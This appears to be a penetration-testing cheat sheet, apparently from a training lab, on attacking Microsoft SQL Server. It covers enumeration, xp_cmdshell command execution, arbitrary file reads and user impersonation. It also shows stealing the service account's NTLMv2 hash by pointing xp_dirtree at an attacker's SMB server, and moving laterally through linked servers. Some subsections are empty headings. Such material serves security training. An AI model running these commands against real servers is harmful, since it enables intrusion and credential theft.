MSSQL
Introduction
Microsoft SQL (MSSQL) is Microsoft's SQL-based relational database management system The default MSSQL port is 1433 TCP
MSSQL Enumeration & Connection to the Server
Enumeration with Nmap NSE:
sudo nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 10.129.201.248
Log in to the MSSQL server using Windows authentication:
mssqlclient.py <user>@<FQDN/IP> -windows-auth
Connect to the MSSQL Server using sqlcmd:
sqlcmd -S SRVMSSQL -U validuser -P validpassword -y 30 -Y 30
Connect to the MSSQL Server using sqsh:
sqsh -S 10.129.203.7 -U validuser -P validpassword -h
Connect using local windows account:
sqsh -S 10.129.203.7 -U .\\validuser -P validpassword -h
Interacting with a MSSQL Server
SELECT name FROM master.dbo.sysdatabases
Show databases
USE users
Use a database
SELECT table_name FROM users.INFORMATION_SCHEMA.TABLES
Show tables from users database
SELECT * FROM users
Select all Data from Table "users"
MSSQL Command Execution
MSSQL can allow command execution through the xp_cmdshell command:
xp_cmdshell 'whoami'
The commands will be executed using the mssql's service account privileges.
Enabling xp_cmdshell: If xp_cmdshell is disabled, you might be able to enable it using the following commands:
MSSQL File Read
We can read any file to which the account has read access using the following query:
SELECT * FROM OPENROWSET(BULK N'C:/Windows/System32/drivers/etc/hosts', SINGLE_CLOB) AS Contents
MSSQL File Write
To write files using MSSQL, we need to enable Ole Automation Procedures, which requires admin privileges
After that, we need to execute some stored procedures to create the file:
Enable Ole Automation Procedures:
Create a File:
Capture MSSQL Service Hash
It's possible to capture the MSSQL Service user's account hash using a fake SMB Server or Responder
When using the MSSQL
xp_subdirs
orxp_dirtree
stored procedures pointing to our fake SMB Server, the MSSQL Service will be forced to authenticate using his NTLMv2 hash
Follow these steps:
Start Responder or start SMB fake server:
sudo responder -I tun0
orsudo impacket-smbserver share ./ -smb2support
Hash stealing through xp_dirtree:
EXEC master..xp_dirtree '\\10.10.110.17\share\'
Hash stealing through xp_subdirs:
EXEC master..xp_subdirs '\\10.10.110.17\share\'
MSSQL - Impersonate Existing Users
SQL Server has a special permission, named IMPERSONATE, that allows the executing user to take on the permissions of another user or login until the context is reset or the session ends
To impersonate a user:
Verify if current account is a sysadmin (By default, sysadmins can impersonate any user)
Identify the users that we can impersonate:
Impersonate a user (example: sa)
Communicating with Other Databases [Linked Servers]
MSSQL has a configuration option called linked servers
If we manage to gain access to a SQL Server with a linked server configured, we may be able to move laterally to that database server.
Administrators can configure a linked server using credentials from the remote server.
If those credentials have sysadmin privileges, we may be able to execute commands in the remote SQL instance.
Follow these steps:
Identify Linked Servers in MSSQL:
SELECT srvname, isremote FROM sysservers
Identify the user for the connection and its privileges:
EXECUTE('select @@servername, @@version, system_user, is_srvrolemember(''sysadmin'')') AT [10.10.10.100\SQLSERVERNAME]
Last updated